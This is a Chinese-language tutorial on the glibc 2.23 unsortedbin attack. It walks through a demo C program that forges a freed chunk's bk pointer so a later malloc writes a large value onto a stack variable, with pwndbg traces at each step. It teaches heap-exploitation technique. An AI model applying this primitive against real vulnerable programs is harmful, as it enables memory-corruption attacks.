Unsortedbin Attack 基本介绍

参考资料:https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/unsorted-bin-attack/

UnSortedbin Attack 概述

unsortedbin attack 顾名思义,该攻击和 Glibc 堆管理中的 Unsortedbin 的机制息息相关 。

unsortedbin attack 被利用的前提是控制 UnSorted Bin Chunk 的 bk 指针

unsortedbin attack 可以达到的效果是实现修改任意地址值为一个较大的数值。

UnSortedbin Attack 回顾

unsortedbin attack 作为一种久远的攻击方式,尝尝作为其他攻击方式的辅助手段,比如修改 global_max_fast 为一个较大的值,使得几乎所有大小的 chunk 都用 fastbin 的管理方式进行分配和释放,又或者修改 _IO_list_all 来伪造 _IO_FILE 进行攻击。在上述攻击的利用过程中我们实际上并不需要对unsortedbin的分配过程有太多了解

global_max_fast 是 main_arena 中控制最大 fastbin 大小的变量

unsortedbin 的结构

unsortedbin 在管理时为循环双向链表,Unsorted Bin 中有两个 bin,那么该链表结构如下

1770394443751-fcb32473-0feb-4ee5-b934-a7a379a5bc22.png

在该链表中必有一个节点(不准确的说,是尾节点,这个就意会一下把,毕竟循环链表实际上没有头尾)的 fd 指针会指向 main_arena 结构体内部。

1770394509370-d623ef98-0efa-45f7-855d-1a48ce206d04.png

倘若只有一个 bin,那么该链表的 fd 和 bk 指针都指向它本身。

UnSortedbin 的基本来源

  1. 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。
  2. 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中。关于 top chunk 的解释,请参考下面的介绍。
  3. 当进行 malloc_consolidate 时,可能会把合并后的 chunk 放到 unsorted bin 中,如果不是和 top chunk 近邻的话。malloc_consolidate(对堆中的碎片进行整理,减少堆中的碎片)。

unsortedbin 的使用

  1. 在 unsortedbin 的使用过程中,采用的遍历顺序是 FIFO(First In Frist out)先进先出,即插入的时候插入到 unsortedbin 的头部,取出的时候从链尾获取,因此 unsortedbin 遍历堆块的时候使用的是 bk 指针。
  2. 在程序进行 malloc 时,如果在 fastbin,smallbin 中找不到对应大小的 chunk,就会尝试从 unsortedbin 中寻找 chunk。如果取出的 chunk 大小正好满足,就会直接返还给用户,否则就会把这些 chunk 分别插入到相应的 bin 中。

UnsortedBin Attack 原理

1
2
3
4
5
6
#glibc-2.23/malloc/malloc.c
#源码第3515-3517
		  /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);
//unsorted_chunks(av)其实是&main_arena.top

可以看一下 glibc 的源码,当将一个 unsortedbin 取出时,会将 bck->fd 的位置写入 UnSortedbin 的位置,换而言之:如果我们控制了 bk 的值,就可以将 unsorted_chunk(av)写到任意地址。

以下通过一个实例来掩饰 unsortedbin_attack 的原理,目标是通过攻击将 stack_var 改成一个很大的值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <stdio.h>
#include <stdlib.h>

int main(){

    fprintf(stderr, "unsorted bin attack 实现了把一个超级大的数(unsorted bin 的地址)写到一个地方\n");
    fprintf(stderr, "实际上这种攻击方法常常用来修改 global_max_fast 来为进一步的 fastbin attack 做准备\n\n");

    unsigned long stack_var=0;
    fprintf(stderr, "我们准备把这个地方 %p 的值 %ld 更改为一个很大的数\n\n", &stack_var, stack_var);

    unsigned long *p=malloc(0x410);
    fprintf(stderr, "一开始先申请一个比较正常的 chunk: %p\n",p);
    fprintf(stderr, "再分配一个避免与 top chunk 合并\n\n");
    malloc(500);

    free(p);
    fprintf(stderr, "当我们释放掉第一个 chunk 之后他会被放到 unsorted bin 中,同时它的 bk 指针为 %p\n",(void*)p[1]);

    p[1]=(unsigned long)(&stack_var-2);
    fprintf(stderr, "现在假设有个漏洞,可以让我们修改 free 了的 chunk 的 bk 指针\n");
    fprintf(stderr, "我们把目标地址(想要改为超大值的那个地方)减去 0x10 写到 bk 指针:%p\n\n",(void*)p[1]);

    malloc(0x410);
    fprintf(stderr, "再去 malloc 的时候可以发现那里的值已经改变为 unsorted bin 的地址\n");
    fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
}

执行之前,先给程序换一个低版本的 libc

1
2
patchelf --set-interpreter ./glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so ./test1
patchelf --set-rpath /home/kali/Desktop/glibc-all-in-one/libs/2.23-0ubuntu3_amd64 ./test1

下面开始对程序进行调试:我们直到stack_var 初始值为 0,运行到这里看一下:

stack_var&p 的初始值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
──────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────
0x400722 <main+124>    mov    edi, 0x410     EDI => 0x410
   0x400727 <main+129>    call   malloc@plt                  <malloc@plt>
 
   0x40072c <main+134>    mov    qword ptr [rbp - 0x10], rax
   0x400730 <main+138>    mov    rax, qword ptr [rip + 0x200929]     RAX, [stderr@@GLIBC_2.2.5]
   0x400737 <main+145>    mov    rdx, qword ptr [rbp - 0x10]
   0x40073b <main+149>    mov    esi, 0x400a18                       ESI => 0x400a18 ◂— in al, 0xb8
   0x400740 <main+154>    mov    rdi, rax
   0x400743 <main+157>    mov    eax, 0                              EAX => 0
   0x400748 <main+162>    call   fprintf@plt                 <fprintf@plt>
 
   0x40074d <main+167>    mov    rax, qword ptr [rip + 0x20090c]     RAX, [stderr@@GLIBC_2.2.5]
   0x400754 <main+174>    mov    rcx, rax
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> info local
stack_var = 0
p = 0x7fffffffddd0
pwndbg> x/10gx &p
0x7fffffffdce0: 0x00007fffffffddd0      0xc9bcfe6894c28c00
0x7fffffffdcf0: 0x0000000000400870      0x00007ffff7820830
0x7fffffffdd00: 0x0000000000000000      0x00007fffffffddd8
0x7fffffffdd10: 0x0000000100000000      0x00000000004006a6
0x7fffffffdd20: 0x0000000000000000      0x4d609e7044d2a5b4
pwndbg> x/10gx &stack_var
0x7fffffffdcd8: 0x0000000000000000      0x00007fffffffddd0
0x7fffffffdce8: 0xc9bcfe6894c28c00      0x0000000000400870
0x7fffffffdcf8: 0x00007ffff7820830      0x0000000000000000
0x7fffffffdd08: 0x00007fffffffddd8      0x0000000100000000
0x7fffffffdd18: 0x00000000004006a6      0x0000000000000000

我们可以看到:

此时stack_var 值为 0,地址为0x7fffffffdce0;p 的值为0x7fffffffddd0,地址为0x7fffffffdcd8。

unsigned long *p=malloc(0x410);

继续让程序执行 unsigned long *p=malloc(0x410);,继续查看内存:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
──────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────
   0x400722 <main+124>    mov    edi, 0x410     EDI => 0x410
   0x400727 <main+129>    call   malloc@plt                  <malloc@plt>
 
   0x40072c <main+134>    mov    qword ptr [rbp - 0x10], rax
0x400730 <main+138>    mov    rax, qword ptr [rip + 0x200929]     RAX, [stderr@@GLIBC_2.2.5] => 0x7ffff7bc4540 (_IO_2_1_stderr_) ◂— 0xfbad2887
   0x400737 <main+145>    mov    rdx, qword ptr [rbp - 0x10]         RDX, [{p}] => 0x602010 ◂— 0
   0x40073b <main+149>    mov    esi, 0x400a18                       ESI => 0x400a18 ◂— in al, 0xb8
   0x400740 <main+154>    mov    rdi, rax                            RDI => 0x7ffff7bc4540 (_IO_2_1_stderr_) ◂— 0xfbad2887
   0x400743 <main+157>    mov    eax, 0                              EAX => 0
   0x400748 <main+162>    call   fprintf@plt                 <fprintf@plt>
 
   0x40074d <main+167>    mov    rax, qword ptr [rip + 0x20090c]     RAX, [stderr@@GLIBC_2.2.5]
   0x400754 <main+174>    mov    rcx, rax
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> heap
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                            
                                                                                                                                                                                         
Allocated chunk | PREV_INUSE
Addr: 0x602000
Size: 0x420 (with flag bits: 0x421)

Top chunk | PREV_INUSE
Addr: 0x602420
Size: 0x20be0 (with flag bits: 0x20be1)

pwndbg> info local
stack_var = 0
p = 0x602010
pwndbg> x/20gx 0x602000
0x602000:       0x0000000000000000      0x0000000000000421==>chunk1
0x602010:       0x0000000000000000      0x0000000000000000
malloc(500);

继续执行 malloc(500);此时创建了两个堆块,这里是为了避免 chunk1 和 top_chunk 相邻而导致在 freechunk1 时无法会受到 unsortedbin 当中。当我们释放一个不属于 fastbin 的 chunk ,并且该 chunk 不和 top_chunk 相邻,该 chunk 会被首先放到 unsortedbin 当中,相邻则被放在 top_chunk

1
2
3
4
5
6
7
8
9
10
11
12
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x602000==>chunk1
Size: 0x420 (with flag bits: 0x421)

Allocated chunk | PREV_INUSE
Addr: 0x602420==>chunk2
Size: 0x200 (with flag bits: 0x201)

Top chunk | PREV_INUSE
Addr: 0x602620
Size: 0x209e0 (with flag bits: 0x209e1)
继续 n 执行 free(p);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
───────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────
   0x40076b <main+197>    mov    edi, 0x1f4        EDI => 0x1f4
   0x400770 <main+202>    call   malloc@plt                  <malloc@plt>
 
   0x400775 <main+207>    mov    rax, qword ptr [rbp - 0x10]     RAX, [{p}] => 0x602010 ◂— 0
   0x400779 <main+211>    mov    rdi, rax                        RDI => 0x602010 ◂— 0
   0x40077c <main+214>    call   free@plt                    <free@plt>
 
0x400781 <main+219>    mov    rax, qword ptr [rbp - 0x10]         RAX, [{p}] => 0x602010 —▸ 0x7ffff7bc3b78 ◂— 0x602620 /* ' &`' */
   0x400785 <main+223>    add    rax, 8                              RAX => 0x602018 (0x602010 + 0x8)
   0x400789 <main+227>    mov    rax, qword ptr [rax]                RAX, [0x602018] => 0x7ffff7bc3b78 —▸ 0x602620 ◂— 0
   0x40078c <main+230>    mov    rdx, rax                            RDX => 0x7ffff7bc3b78 —▸ 0x602620 ◂— 0
   0x40078f <main+233>    mov    rax, qword ptr [rip + 0x2008ca]     RAX, [stderr@@GLIBC_2.2.5] => 0x7ffff7bc4540 (_IO_2_1_stderr_) ◂— 0xfbad2887
   0x400796 <main+240>    mov    esi, 0x400a80                       ESI => 0x400a80 ◂— in eax, 0xbd
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
pwndbg> bins
fastbins
empty
unsortedbin
all: 0x602000 —▸ 0x7ffff7bc3b78 ◂— 0x602000
smallbins
empty
largebins
empty
pwndbg> x/20gx 0x602000
0x602000:       0x0000000000000000      0x0000000000000421==>unsortedbin
0x602010:       0x00007ffff7bc3b78      0x00007ffff7bc3b78
                --fd                    --bk
0x602020:       0x0000000000000000      0x0000000000000000
0x602030:       0x0000000000000000      0x0000000000000000
0x602040:       0x0000000000000000      0x0000000000000000
0x602050:       0x0000000000000000      0x0000000000000000

我们之前了解到,当 unsortedbin 之后一个 free_chunk 时,他的fd和bk指针都指向 unsortedbin 本身。

1605518448778-38373f22-a306-4fe8-8c15-7a084e086147.png

执行p[1]=(unsigned long)(&stack_var-2);

p[1]等价于*(p+1),即p指向的地址偏移 1 个元素长度的位置(比如p是 8 字节指针,p[1]就是p+8的地址)

p[1]等价于(p+8)= (0x602010+8)= 0x602018这正是 chunk 的bk字段的地址!

stack_var的地址是0x7fffffffdcd8rbp-0x18);

&stack_var - 2 = 0x7fffffffdcd8 - 0x10 = 0x7fffffffdcc8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
───────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────
   0x4007a8 <main+258>    mov    rax, qword ptr [rbp - 0x10]         RAX, [{p}] => 0x602010 —▸ 0x7ffff7bc3b78 ◂— 0x602620 /* ' &`' */
   0x4007ac <main+262>    lea    rdx, [rax + 8]                      RDX => 0x602018 —▸ 0x7ffff7bc3b78 —▸ 0x602620 ◂— ...
   0x4007b0 <main+266>    lea    rax, [rbp - 0x18]                   RAX => 0x7fffffffdcd8 ◂— 0
   0x4007b4 <main+270>    sub    rax, 0x10                           RAX => 0x7fffffffdcc8 (0x7fffffffdcd8 - 0x10)
   0x4007b8 <main+274>    mov    qword ptr [rdx], rax                [0x602018] <= 0x7fffffffdcc8 —▸ 0x4007a8 (main+258) ◂— mov rax, qword ptr [rbp - 0x10]
0x4007bb <main+277>    mov    rax, qword ptr [rip + 0x20089e]     RAX, [stderr@@GLIBC_2.2.5] => 0x7ffff7bc4540 (_IO_2_1_stderr_) ◂— 0xfbad2887
   0x4007c2 <main+284>    mov    rcx, rax                            RCX => 0x7ffff7bc4540 (_IO_2_1_stderr_) ◂— 0xfbad2887
   0x4007c5 <main+287>    mov    edx, 0x51                           EDX => 0x51
   0x4007ca <main+292>    mov    esi, 1                              ESI => 1
   0x4007cf <main+297>    mov    edi, 0x400af0                       EDI => 0x400af0 ◂— out 0x8e, eax
   0x4007d4 <main+302>    call   fwrite@plt                  <fwrite@plt>
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/20gx 0x602000
0x602000:       0x0000000000000000      0x0000000000000421==>unsortedbin
0x602010:       0x00007ffff7bc3b78      0x00007fffffffdcc8
                --fd                    --bk此时发现bk被更改了
0x602020:       0x0000000000000000      0x0000000000000000
0x602030:       0x0000000000000000      0x0000000000000000
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
pwndbg> unsortedbin
unsortedbin
all [corrupted]
FD: 0x602000 —▸ 0x7ffff7bc3b78 ◂— 0x602000
BK: 0x602000 —▸ 0x7fffffffdcc8 —▸ 0x602010 ◂— 0
pwndbg> x/20gx 0x00007fffffffdcc8
0x7fffffffdcc8: 0x00000000004007a8      0x0000000000400870
-->unsortedbin——bk指针所指的地方

0x7fffffffdcd8: 0x0000000000000000      0x0000000000602010
-->想要被修改为超大值的地方

0x7fffffffdce8: 0xc9bcfe6894c28c00      0x0000000000400870
0x7fffffffdcf8: 0x00007ffff7820830      0x0000000000000000
0x7fffffffdd08: 0x00007fffffffddd8      0x0000000100000000
0x7fffffffdd18: 0x00000000004006a6      0x0000000000000000
0x7fffffffdd28: 0x4d609e7044d2a5b4      0x00000000004005b0
0x7fffffffdd38: 0x00007fffffffddd0      0x0000000000000000
0x7fffffffdd48: 0x0000000000000000      0xb29f610fee32a5b4
0x7fffffffdd58: 0xb29f71f45be2a5b4      0x0000000000000000

攻击本质:把 chunk 的bk指针从main_arena地址改成&stack_var-2(栈地址),这一步依赖 “UAF(释放后使用)” 漏洞 ——free (p) 后仍能修改 p 指向的内存。

1605518532583-ef6d2bd7-01e3-4c82-9cdd-21d6d20a1e1a.png

  • 原 chunkbk0x7ffff7bc3b78(main_arena 地址,unsorted bin 的尾节点);
  • 新 chunkbk0x7fffffffdcc8(栈上stack_var偏移 2 个 long 的地址);
  • 最终 unsorted bin 的BK链指向了栈地址0x7fffffffdcc8,而非 libc 的 main_arena。
执行malloc(0x410);

在执行 malloc(0x410)时,会判断所申请的 chunk 处于 smallbin 所在的范围,但此时 smallbin 中并没有空闲的 chunk,所以会从 unsortedbin 中寻找,发现 unsortedbin 不为空,于是把 unsortedbin 中的最后一个 chunk 拿出来。(先进先出原则 FIFO)

1
2
3
4
5
6
7
8
9
pwndbg> unsortedbin
unsortedbin
all [corrupted]
FD: 0x602000 —▸ 0x7ffff7bc3b78 ◂— 0x602000
BK: 0x7fffffffdcc8 —▸ 0x602010 ◂— 0
------------------------------------------------------------------------------------------------------------------
pwndbg> info local
stack_var = 140737349696376
p = 0x602010

核心原理:当调用malloc(0x410)时,glibc 会从 unsorted bin 中查找匹配大小的 chunk,执行链表维护逻辑:

1
2
3
// glibc底层逻辑(简化)
bck = unsorted_chunks(av)->bk;  // bck就是我们篡改后的&stack_var-2
bck->fd = unsorted_chunks(av);  // 把unsorted bin的地址写入bck->fd(即&stack_var-2 + 8 = &stack_var)
  • bck->fd = (&stack_var-2) + 8 = &stack_var(因为 fd 字段在 chunk 中偏移 8 字节);
  • &stack_var-2:64 位下unsigned long占 8 字节,-2等价于地址减0x10(即0x7fffffffdcc8)
  • 最终:unsorted_chunks(av)(unsorted bin 的地址)被写入stack_var的地址,stack_var的值从 0 变成这个高地址(“超大数”)。

1605532168101-57e7d7b0-b051-4c2d-89b2-2fb8cdd2c2a5.png1605532214849-ed5b7433-5172-407f-b9a0-ee4bb07306fa.png1770396565331-c320a05e-4295-4a28-ae87-d99ba95e7037.png

总结

首先我们将一个堆块释放到 unsortedbin 当中,然后利用堆溢出修改 unsortedbin 中的 chunk 的 bk 指针,这个 bk 指针指向 target_addr-0x10。当我们用 malloc 申请 unsortedbin 中的堆块时,target_addr 中的值就会变成 main_arena+88 地址的值# target_addr:目标地址(想要修改为超大数的地址)。

更新: 2026-03-09 13:21:34
原文: https://www.yuque.com/idcm/wnemg9/qq62i2u19syawd01